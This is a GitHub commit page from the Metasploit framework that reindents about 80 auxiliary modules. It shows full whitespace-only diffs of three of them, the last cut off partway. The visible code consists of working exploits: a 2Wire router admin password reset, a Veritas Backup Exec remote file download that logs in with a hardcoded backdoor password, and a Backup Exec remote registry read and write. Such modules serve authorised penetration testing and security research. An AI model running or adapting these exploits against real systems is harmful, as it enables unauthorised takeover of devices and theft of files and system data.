
Retab modules

1 parent 7e5e0f7 commit 41e4375e43443bb568729a3079d3bf9944cbc669 @tabassassin tabassassin committed Aug 30, 2013
Showing with 9,564 additions and 9,564 deletions.
  1. +131 −131 modules/auxiliary/admin/2wire/xslt_password_reset.rb
  2. +264 −264 modules/auxiliary/admin/backupexec/dump.rb
  3. +263 −263 modules/auxiliary/admin/backupexec/registry.rb
  4. +93 −93 modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
  5. +60 −60 modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
  6. +80 −80 modules/auxiliary/admin/db2/db2rcmd.rb
  7. +61 −61 modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
  8. +139 −139 modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
  9. +50 −50 modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb
  10. +47 −47 modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
  11. +76 −76 modules/auxiliary/admin/hp/hp_data_protector_cmd.rb
  12. +170 −170 modules/auxiliary/admin/http/axigen_file_access.rb
  13. +51 −51 modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
  14. +56 −56 modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
  15. +71 −71 modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
  16. +70 −70 modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
  17. +134 −134 modules/auxiliary/admin/http/foreman_openstack_satellite_priv_esc.rb
  18. +40 −40 modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
  19. +84 −84 modules/auxiliary/admin/http/iis_auth_bypass.rb
  20. +103 −103 modules/auxiliary/admin/http/intersil_pass_reset.rb
  21. +48 −48 modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
  22. +91 −91 modules/auxiliary/admin/http/jboss_seam_exec.rb
  23. +82 −82 modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
  24. +192 −192 modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
  25. +167 −167 modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
  26. +122 −122 modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
  27. +49 −49 modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb
  28. +154 −154 modules/auxiliary/admin/http/rails_devise_pass_reset.rb
  29. +69 −69 modules/auxiliary/admin/http/scrutinizer_add_user.rb
  30. +120 −120 modules/auxiliary/admin/http/tomcat_administration.rb
  31. +91 −91 modules/auxiliary/admin/http/tomcat_utf8_traversal.rb
  32. +87 −87 modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb
  33. +140 −140 modules/auxiliary/admin/http/typo3_sa_2009_001.rb
  34. +96 −96 modules/auxiliary/admin/http/typo3_sa_2009_002.rb
  35. +131 −131 modules/auxiliary/admin/http/typo3_sa_2010_020.rb
  36. +193 −193 modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb
  37. +67 −67 modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb
  38. +107 −107 modules/auxiliary/admin/misc/wol.rb
  39. +50 −50 modules/auxiliary/admin/motorola/wr850g_cred.rb
  40. +73 −73 modules/auxiliary/admin/ms/ms08_059_his2006.rb
  41. +799 −799 modules/auxiliary/admin/mssql/mssql_enum.rb
  42. +23 −23 modules/auxiliary/admin/mssql/mssql_exec.rb
  43. +448 −448 modules/auxiliary/admin/mssql/mssql_findandsampledata.rb
  44. +143 −143 modules/auxiliary/admin/mssql/mssql_idf.rb
  45. +72 −72 modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb
  46. +48 −48 modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb
  47. +37 −37 modules/auxiliary/admin/mssql/mssql_sql.rb
  48. +40 −40 modules/auxiliary/admin/mssql/mssql_sql_file.rb
  49. +200 −200 modules/auxiliary/admin/mysql/mysql_enum.rb
  50. +36 −36 modules/auxiliary/admin/mysql/mysql_sql.rb
  51. +90 −90 modules/auxiliary/admin/natpmp/natpmp_map.rb
  52. +48 −48 modules/auxiliary/admin/officescan/tmlisten_traversal.rb
  53. +59 −59 modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
  54. +49 −49 modules/auxiliary/admin/oracle/oracle_login.rb
  55. +42 −42 modules/auxiliary/admin/oracle/oracle_sql.rb
  56. +679 −679 modules/auxiliary/admin/oracle/oraenum.rb
  57. +33 −33 modules/auxiliary/admin/oracle/osb_execqr.rb
  58. +53 −53 modules/auxiliary/admin/oracle/osb_execqr2.rb
  59. +50 −50 modules/auxiliary/admin/oracle/osb_execqr3.rb
  60. +73 −73 modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
  61. +63 −63 modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
  62. +57 −57 modules/auxiliary/admin/oracle/sid_brute.rb
  63. +51 −51 modules/auxiliary/admin/oracle/tnscmd.rb
  64. +45 −45 modules/auxiliary/admin/pop2/uw_fileretrieval.rb
  65. +59 −59 modules/auxiliary/admin/postgres/postgres_readfile.rb
  66. +49 −49 modules/auxiliary/admin/postgres/postgres_sql.rb
  67. +56 −56 modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb
  68. +195 −195 modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb
  69. +50 −50 modules/auxiliary/admin/scada/igss_exec_17.rb
  70. +163 −163 modules/auxiliary/admin/scada/modicon_command.rb
  71. +209 −209 modules/auxiliary/admin/scada/modicon_password_recovery.rb
  72. +286 −286 modules/auxiliary/admin/scada/modicon_stux_transfer.rb
  73. +123 −123 modules/auxiliary/admin/scada/multi_cip_command.rb
  74. +348 −348 modules/auxiliary/admin/serverprotect/file.rb
  75. +77 −77 modules/auxiliary/admin/smb/check_dir_file.rb
  76. +75 −75 modules/auxiliary/admin/smb/list_directory.rb
  77. +123 −123 modules/auxiliary/admin/smb/psexec_command.rb
  78. +231 −231 modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
  79. +54 −54 modules/auxiliary/admin/smb/samba_symlink_traversal.rb
  80. +56 −56 modules/auxiliary/admin/smb/upload_file.rb
262 modules/auxiliary/admin/2wire/xslt_password_reset.rb
@@ -9,136 +9,136 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::HttpClient
-
- def initialize(info={})
- super(update_info(info,
- 'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
- 'Description' => %q{
- This module will reset the admin password on a 2Wire wireless router. This is
- done by using the /xslt page where authentication is not required, thus allowing
- configuration changes (such as resetting the password) as administrators.
- },
- 'License' => MSF_LICENSE,
- 'Author' =>
- [
- 'hkm [at] hakim.ws', #Initial discovery, poc
- 'Travis Phillips', #Msf module
- ],
- 'References' =>
- [
- [ 'CVE', '2007-4387' ],
- [ 'OSVDB', '37667' ],
- [ 'BID', '36075' ],
- [ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
- ],
- 'DisclosureDate' => "Aug 15 2007" ))
-
- register_options(
- [
- OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
- ], self.class)
- end
-
- def run
-
- print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => '/xslt?PAGE=A07',
- }, 25)
-
- if not res
- print_error("No response from server")
- return
- end
-
- #check to see if we get HTTP OK
- if (res.code == 200)
- print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
- else
- print_error("Did not get HTTP 200, URL was not found. Exiting!")
- return
- end
-
- #Check to verify server reported is a 2wire router
- if (res.headers['Server'].match(/2wire Gateway/i))
- print_status("Server is a 2wire Gateway! Grabbing info\n")
- else
- print_error("Target doesn't seem to be a 2wire router. Exiting!")
- return
- end
-
- print_status("---===[ Router Information ]===---")
-
- # Grabbing the Model Number
- if res.body.match(/<td class="textmono">(.*)<\/td>/i)
- model = $1
- print_status("Model: #{model}")
- end
-
- # Grabbing the serial Number
- if res.body.match(/<td class="data">(\d{12})<\/td>/i)
- serial = $1
- print_status("Serial: #{serial}")
- end
-
- # Grabbing the Hardware Version
- if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
- hardware = $1
- print_status("Hardware Version: #{hardware}")
- end
-
- #Check the Software Version
- if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
- ver = $1
- print_status("Software version: #{ver}")
- else
- print_error("Target is not a version 5 router. Exiting!")
- return
- end
-
- # Grabbing the Key Code
- if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
- key = $1
- print_status("Key Code: #{key}\n")
- end
-
- print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
- print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
-
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => '/xslt?PAGE=H04',
- }, 25)
-
- if ( res and res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
- print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
-
- data = 'PAGE=H04_POST'
- data << '&THISPAGE=H04'
- data << '&NEXTPAGE=A01'
- data << '&PASSWORD=' + datastore['PASSWORD']
- data << '&PASSWORD_CONF=' + datastore['PASSWORD']
- data << '&HINT='
-
- res = send_request_cgi(
- {
- 'method' => 'POST',
- 'uri' => '/xslt',
- 'data' => data,
- }, 25)
-
- if res and res.code == 200
- if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
- cookie= $1
- print_status("Got cookie #{cookie}. Password reset was successful!\n")
- end
- end
- end
-
- end
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "2Wire Cross-Site Request Forgery Password Reset Vulnerability",
+ 'Description' => %q{
+ This module will reset the admin password on a 2Wire wireless router. This is
+ done by using the /xslt page where authentication is not required, thus allowing
+ configuration changes (such as resetting the password) as administrators.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hkm [at] hakim.ws', #Initial discovery, poc
+ 'Travis Phillips', #Msf module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2007-4387' ],
+ [ 'OSVDB', '37667' ],
+ [ 'BID', '36075' ],
+ [ 'URL', 'http://seclists.org/bugtraq/2007/Aug/225' ],
+ ],
+ 'DisclosureDate' => "Aug 15 2007" ))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
+ ], self.class)
+ end
+
+ def run
+
+ print_status("Attempting to connect to http://#{rhost}/xslt?PAGE=A07 to gather information")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/xslt?PAGE=A07',
+ }, 25)
+
+ if not res
+ print_error("No response from server")
+ return
+ end
+
+ #check to see if we get HTTP OK
+ if (res.code == 200)
+ print_status("Okay, Got an HTTP 200 (okay) code. Verifying Server header")
+ else
+ print_error("Did not get HTTP 200, URL was not found. Exiting!")
+ return
+ end
+
+ #Check to verify server reported is a 2wire router
+ if (res.headers['Server'].match(/2wire Gateway/i))
+ print_status("Server is a 2wire Gateway! Grabbing info\n")
+ else
+ print_error("Target doesn't seem to be a 2wire router. Exiting!")
+ return
+ end
+
+ print_status("---===[ Router Information ]===---")
+
+ # Grabbing the Model Number
+ if res.body.match(/<td class="textmono">(.*)<\/td>/i)
+ model = $1
+ print_status("Model: #{model}")
+ end
+
+ # Grabbing the serial Number
+ if res.body.match(/<td class="data">(\d{12})<\/td>/i)
+ serial = $1
+ print_status("Serial: #{serial}")
+ end
+
+ # Grabbing the Hardware Version
+ if res.body.match(/<td class="data">(\d{4}-\d{6}-\d{3})<\/td>/i)
+ hardware = $1
+ print_status("Hardware Version: #{hardware}")
+ end
+
+ #Check the Software Version
+ if res.body.match(/<td class="data">(5\.\d{1,3}\.\d{1,3}\.\d{1,3})<\/td>/i)
+ ver = $1
+ print_status("Software version: #{ver}")
+ else
+ print_error("Target is not a version 5 router. Exiting!")
+ return
+ end
+
+ # Grabbing the Key Code
+ if res.body.match(/<td class="data">(\w{4}-\w{4}-\w{4}-\w{4}-\w{4})<\/td>/i)
+ key = $1
+ print_status("Key Code: #{key}\n")
+ end
+
+ print_status("Attempting to exploit Password Reset Vulnerability on #{rhost}")
+ print_status("Connecting to http://#{rhost}/xslt?PAGE=H04 to make sure page exist.")
+
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/xslt?PAGE=H04',
+ }, 25)
+
+ if ( res and res.code == 200 and res.body.match(/<title>System Setup - Password<\/title>/i))
+ print_status("Found password reset page. Attempting to reset admin password to #{datastore['PASSWORD']}")
+
+ data = 'PAGE=H04_POST'
+ data << '&THISPAGE=H04'
+ data << '&NEXTPAGE=A01'
+ data << '&PASSWORD=' + datastore['PASSWORD']
+ data << '&PASSWORD_CONF=' + datastore['PASSWORD']
+ data << '&HINT='
+
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'uri' => '/xslt',
+ 'data' => data,
+ }, 25)
+
+ if res and res.code == 200
+ if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/(.*); path=\//))
+ cookie= $1
+ print_status("Got cookie #{cookie}. Password reset was successful!\n")
+ end
+ end
+ end
+
+ end
end
528 modules/auxiliary/admin/backupexec/dump.rb
@@ -11,269 +11,269 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::NDMP
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Veritas Backup Exec Windows Remote File Access',
- 'Description' => %q{
- This module abuses a logic flaw in the Backup Exec Windows Agent to download
- arbitrary files from the system. This flaw was found by someone who wishes to
- remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
- output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
- listed in the references section. To transfer an entire directory, specify a
- path that includes a trailing backslash.
- },
- 'Author' => [ 'hdm', 'Unknown' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2005-2611'],
- ['OSVDB', '18695'],
- ['BID', '14551'],
- ['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
- ],
- 'Actions' =>
- [
- ['Download']
- ],
- 'DefaultAction' => 'Download'
- ))
-
- register_options(
- [
- Opt::RPORT(10000),
- OptAddress.new('LHOST',
- [
- false,
- "The local IP address to accept the data connection"
- ]
- ),
- OptPort.new('LPORT',
- [
- false,
- "The local port to accept the data connection"
- ]
- ),
- OptString.new('RPATH',
- [
- true,
- "The remote filesystem path to download",
- "C:\\boot.ini"
- ]
- ),
- OptString.new('LPATH',
- [
- true,
- "The local filename to store the exported data",
- "backupexec_dump.mtf"
- ]
- ),
- ], self.class)
- end
-
- def run
- print_status("Attempting to retrieve #{datastore['RPATH']}...")
-
- lfd = File.open(datastore['LPATH'], 'wb')
-
- connect
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response from the agent")
- disconnect
- return
- end
-
- username = "root"
- password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
-
- #
- # Authenticate using the backdoor password
- #
- auth = [
- 1,
- Time.now.to_i,
- 0,
- 0x0901,
- 0,
- 0,
- 2,
- username.length,
- username,
- password
- ].pack('NNNNNNNNA*A*')
-
- print_status("Sending magic authentication request...")
- ndmp_send(auth)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our authentication request")
- disconnect
- return
- end
-
-
- #
- # Create our listener for the data connection
- #
- print_status("Starting our data listener...")
- sfd = Rex::Socket.create_tcp_server(
- 'LocalPort' => datastore['LPORT']
- )
-
- local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
- local_port = sfd.getsockname[2]
-
- #
- # Create the DATA_CONNECT request
- #
- conn = [
- 3,
- 0,
- 0,
- 0x040a,
- 0,
- 0,
- 1,
- Rex::Socket.gethostbyname(local_addr)[3],
- local_port
- ].pack('NNNNNNNA4N')
-
- print_status("Sending data connection request...")
- ndmp_send(conn)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our data connection request")
- sfd.close
- disconnect
- return
- end
-
- #
- # Wait for the agent to connect back
- #
- print_status("Waiting for the data connection...")
- rfd = sfd.accept()
- sfd.close
-
-
- #
- # Create the Mover Set Record Size request
- #
- msrs = [
- 4,
- 0,
- 0,
- 0x0a08,
- 0,
- 0,
- 0x8000
- ].pack('NNNNNNN')
-
- print_status("Sending transfer parameters...")
- ndmp_send(msrs)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our parameters request")
- disconnect
- return
- end
-
- #
- # Define our tranfer parameters
- #
- xenv =
- [
- ['USERNAME', ''],
- ['BU_EXCLUDE_ACTIVE_FILES', '0'],
- ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
- ]
-
- #
- # Create the DATA_START_BACKUP request
- #
- bkup = [
- 5,
- 0,
- 0,
- 0x0401,
- 0,
- 0,
- 4
- ].pack('NNNNNNN')
- bkup += "dump"
- bkup += [ xenv.length ].pack('N')
-
- #
- # Encode the transfer parameters
- #
- xenv.each do |e|
- k,v = e
-
- # Variable
- bkup += [k.length].pack('N')
- bkup += k
- bkup += Rex::Encoder::NDR.align(k)
-
- # Value
- bkup += [v.length].pack('N')
- bkup += v
- bkup += Rex::Encoder::NDR.align(v)
- end
-
- bkup[-1, 1] = "\x01"
-
- print_status("Sending backup request...")
- ndmp_send(bkup)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our backup request")
- disconnect
- return
- end
-
- #
- # Create the GET_ENV request
- #
- genv = [
- 5,
- 0,
- 0,
- 0x4004,
- 0,
- 0
- ].pack('NNNNNN')
-
- print_status("Sending environment request...")
- ndmp_send(genv)
- data = ndmp_recv()
- if (not data)
- print_error("Did not receive a response to our environment request")
- disconnect
- return
- end
-
- #
- # Start transferring data
- #
- print_status("Transferring data...")
- bcnt = 0
-
- begin
- while (data = rfd.get_once)
- bcnt += data.length
- lfd.write(data)
- end
- rescue ::EOFError
- end
-
- lfd.close
- rfd.close
-
- print_status("Transferred #{bcnt} bytes.")
- disconnect
-
- end
+ include Msf::Exploit::Remote::NDMP
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Veritas Backup Exec Windows Remote File Access',
+ 'Description' => %q{
+ This module abuses a logic flaw in the Backup Exec Windows Agent to download
+ arbitrary files from the system. This flaw was found by someone who wishes to
+ remain anonymous and affects all known versions of the Backup Exec Windows Agent. The
+ output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program
+ listed in the references section. To transfer an entire directory, specify a
+ path that includes a trailing backslash.
+ },
+ 'Author' => [ 'hdm', 'Unknown' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2005-2611'],
+ ['OSVDB', '18695'],
+ ['BID', '14551'],
+ ['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
+ ],
+ 'Actions' =>
+ [
+ ['Download']
+ ],
+ 'DefaultAction' => 'Download'
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(10000),
+ OptAddress.new('LHOST',
+ [
+ false,
+ "The local IP address to accept the data connection"
+ ]
+ ),
+ OptPort.new('LPORT',
+ [
+ false,
+ "The local port to accept the data connection"
+ ]
+ ),
+ OptString.new('RPATH',
+ [
+ true,
+ "The remote filesystem path to download",
+ "C:\\boot.ini"
+ ]
+ ),
+ OptString.new('LPATH',
+ [
+ true,
+ "The local filename to store the exported data",
+ "backupexec_dump.mtf"
+ ]
+ ),
+ ], self.class)
+ end
+
+ def run
+ print_status("Attempting to retrieve #{datastore['RPATH']}...")
+
+ lfd = File.open(datastore['LPATH'], 'wb')
+
+ connect
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response from the agent")
+ disconnect
+ return
+ end
+
+ username = "root"
+ password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"
+
+ #
+ # Authenticate using the backdoor password
+ #
+ auth = [
+ 1,
+ Time.now.to_i,
+ 0,
+ 0x0901,
+ 0,
+ 0,
+ 2,
+ username.length,
+ username,
+ password
+ ].pack('NNNNNNNNA*A*')
+
+ print_status("Sending magic authentication request...")
+ ndmp_send(auth)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our authentication request")
+ disconnect
+ return
+ end
+
+
+ #
+ # Create our listener for the data connection
+ #
+ print_status("Starting our data listener...")
+ sfd = Rex::Socket.create_tcp_server(
+ 'LocalPort' => datastore['LPORT']
+ )
+
+ local_addr = (datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']))
+ local_port = sfd.getsockname[2]
+
+ #
+ # Create the DATA_CONNECT request
+ #
+ conn = [
+ 3,
+ 0,
+ 0,
+ 0x040a,
+ 0,
+ 0,
+ 1,
+ Rex::Socket.gethostbyname(local_addr)[3],
+ local_port
+ ].pack('NNNNNNNA4N')
+
+ print_status("Sending data connection request...")
+ ndmp_send(conn)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our data connection request")
+ sfd.close
+ disconnect
+ return
+ end
+
+ #
+ # Wait for the agent to connect back
+ #
+ print_status("Waiting for the data connection...")
+ rfd = sfd.accept()
+ sfd.close
+
+
+ #
+ # Create the Mover Set Record Size request
+ #
+ msrs = [
+ 4,
+ 0,
+ 0,
+ 0x0a08,
+ 0,
+ 0,
+ 0x8000
+ ].pack('NNNNNNN')
+
+ print_status("Sending transfer parameters...")
+ ndmp_send(msrs)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our parameters request")
+ disconnect
+ return
+ end
+
+ #
+ # Define our tranfer parameters
+ #
+ xenv =
+ [
+ ['USERNAME', ''],
+ ['BU_EXCLUDE_ACTIVE_FILES', '0'],
+ ['FILESYSTEM', "\"\\\\#{datastore['RHOST']}\\#{datastore['RPATH']}\",v0,t0,l0,n0,f0"]
+ ]
+
+ #
+ # Create the DATA_START_BACKUP request
+ #
+ bkup = [
+ 5,
+ 0,
+ 0,
+ 0x0401,
+ 0,
+ 0,
+ 4
+ ].pack('NNNNNNN')
+ bkup += "dump"
+ bkup += [ xenv.length ].pack('N')
+
+ #
+ # Encode the transfer parameters
+ #
+ xenv.each do |e|
+ k,v = e
+
+ # Variable
+ bkup += [k.length].pack('N')
+ bkup += k
+ bkup += Rex::Encoder::NDR.align(k)
+
+ # Value
+ bkup += [v.length].pack('N')
+ bkup += v
+ bkup += Rex::Encoder::NDR.align(v)
+ end
+
+ bkup[-1, 1] = "\x01"
+
+ print_status("Sending backup request...")
+ ndmp_send(bkup)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our backup request")
+ disconnect
+ return
+ end
+
+ #
+ # Create the GET_ENV request
+ #
+ genv = [
+ 5,
+ 0,
+ 0,
+ 0x4004,
+ 0,
+ 0
+ ].pack('NNNNNN')
+
+ print_status("Sending environment request...")
+ ndmp_send(genv)
+ data = ndmp_recv()
+ if (not data)
+ print_error("Did not receive a response to our environment request")
+ disconnect
+ return
+ end
+
+ #
+ # Start transferring data
+ #
+ print_status("Transferring data...")
+ bcnt = 0
+
+ begin
+ while (data = rfd.get_once)
+ bcnt += data.length
+ lfd.write(data)
+ end
+ rescue ::EOFError
+ end
+
+ lfd.close
+ rfd.close
+
+ print_status("Transferred #{bcnt} bytes.")
+ disconnect
+
+ end
end
526 modules/auxiliary/admin/backupexec/registry.rb
@@ -11,268 +11,268 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::DCERPC
- include ::Rex::Platforms::Windows
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Veritas Backup Exec Server Registry Access',
- 'Description' => %q{
- This modules exploits a remote registry access flaw in the BackupExec Windows
- Server RPC service. This vulnerability was discovered by Pedram Amini and is based
- on the NDR stub information information posted to openrce.org.
- Please see the action list for the different attack modes.
-
- },
- 'Author' => [ 'hdm' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'OSVDB', '17627' ],
- [ 'CVE', '2005-0771' ],
- [ 'URL', 'http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities'],
- ],
- 'Actions' =>
- [
- ['System Information'],
- ['Create Logon Notice']
- ],
- 'DefaultAction' => 'System Information'
- ))
-
- register_options(
- [
- Opt::RPORT(6106),
- OptString.new('WARN',
- [
- false,
- "The warning to display for the Logon Notice action",
- "Compromised by Metasploit!\r\n"
- ]
- ),
- ], self.class)
- end
-
- def auxiliary_commands
- return {
- "regread" => "Read a registry value",
- # "regenum" => "Enumerate registry keys",
- }
- end
-
- def run
- case action.name
- when 'System Information'
- system_info()
- when 'Create Logon Notice'
- logon_notice()
- end
- end
-
-
- def cmd_regread(*args)
-
- if (args.length == 0)
- print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
- return
- end
-
- paths = args[0].split("\\")
- hive = paths.shift
- subval = paths.pop
- subkey = paths.join("\\")
- data = backupexec_regread(hive, subkey, subval)
-
- if (data)
- print_status("DATA: #{deunicode(data)}")
- else
- print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
- end
-
- end
-
- def cmd_regenum(*args)
-
- if (args.length == 0)
- print_status("Usage: regenum HKLM\\\\Software")
- return
- end
-
- paths = args[0].split("\\")
- hive = paths.shift
- subkey = "\\" + paths.join("\\")
- data = backupexec_regenum(hive, subkey)
-
- if (data)
- print_status("DATA: #{deunicode(data)}")
- else
- print_error("Failed to enumerate #{hive}\\#{subkey}...")
- end
-
- end
-
- def system_info
- print_status("Dumping system information...")
-
- prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
- prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
- prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
- owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
- company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
- cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
- username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'
-
- print_status("The current interactive user is #{deunicode(username)}")
- print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
- print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
- print_status("The system runs on a #{deunicode(cpu)}")
- end
-
- def logon_notice
- print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
- backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
- backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
- end
-
-
- def deunicode(str)
- str.gsub(/\x00/, '').strip
- end
-
- #
- # Write a registry key
- #
- def backupexec_regwrite(hive, subkey, subval, type, data)
- stub = backupexec_regrpc_write(
- :hive => registry_hive_lookup(hive),
- :subkey => subkey,
- :subval => subval,
- :type => type,
- :data => data
- )
- resp = backupexec_regrpc_call(5, stub)
- return false if resp.length == 0
- return true
- end
-
- #
- # Read a registry key
- #
- def backupexec_regread(hive, subkey, subval, type = REG_SZ)
- stub = backupexec_regrpc_read(
- :hive => registry_hive_lookup(hive),
- :subkey => subkey,
- :subval => subval,
- :type => type
- )
- resp = backupexec_regrpc_call(4, stub)
-
- return nil if resp.length == 0
- ret, len = resp[0,8].unpack('VV')
- return nil if ret == 0
- return nil if len == 0
- return resp[8, len]
- end
-
- #
- # Enumerate a registry key
- #
- def backupexec_regenum(hive, subkey)
- stub = backupexec_regrpc_enum(
- :hive => registry_hive_lookup(hive),
- :subkey => subkey
- )
- resp = backupexec_regrpc_call(7, stub)
- p resp
-
- return nil if resp.length == 0
- ret, len = resp[0,8].unpack('VV')
- return nil if ret == 0
- return nil if len == 0
- return resp[8, len]
- end
-
- #
- # Call the backupexec registry service
- #
- def backupexec_regrpc_call(opnum, data = '')
-
- handle = dcerpc_handle(
- '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
- 'ncacn_ip_tcp', [datastore['RPORT']]
- )
-
- dcerpc_bind(handle)
-
- resp = dcerpc.call(opnum, data)
- outp = ''
-
- if (dcerpc.last_response and dcerpc.last_response.stub_data)
- outp = dcerpc.last_response.stub_data
- end
-
- disconnect
-
- outp
- end
-
- # RPC Service 4
- def backupexec_regrpc_read(opts = {})
- subkey = opts[:subkey] || ''
- subval = opts[:subval] || ''
- hive = opts[:hive] || HKEY_LOCAL_MACHINE
- type = opts[:type] || REG_SZ
-
- stub =
- NDR.UnicodeConformantVaryingString(subkey) +
- NDR.UnicodeConformantVaryingString(subval) +
- NDR.long(type) +
- NDR.long(1024) +
- NDR.long(0) +
- NDR.long(4) +
- NDR.long(4) +
- NDR.long(hive)
- return stub
- end
-
- # RPC Service 7
- def backupexec_regrpc_enum(opts = {})
- subkey = opts[:subkey] || ''
- hive = opts[:hive] || HKEY_LOCAL_MACHINE
- stub =
- NDR.UnicodeConformantVaryingString(subkey) +
- NDR.long(4096) +
- NDR.long(0) +
- NDR.long(4) +
- NDR.long(4) +
- NDR.long(hive)
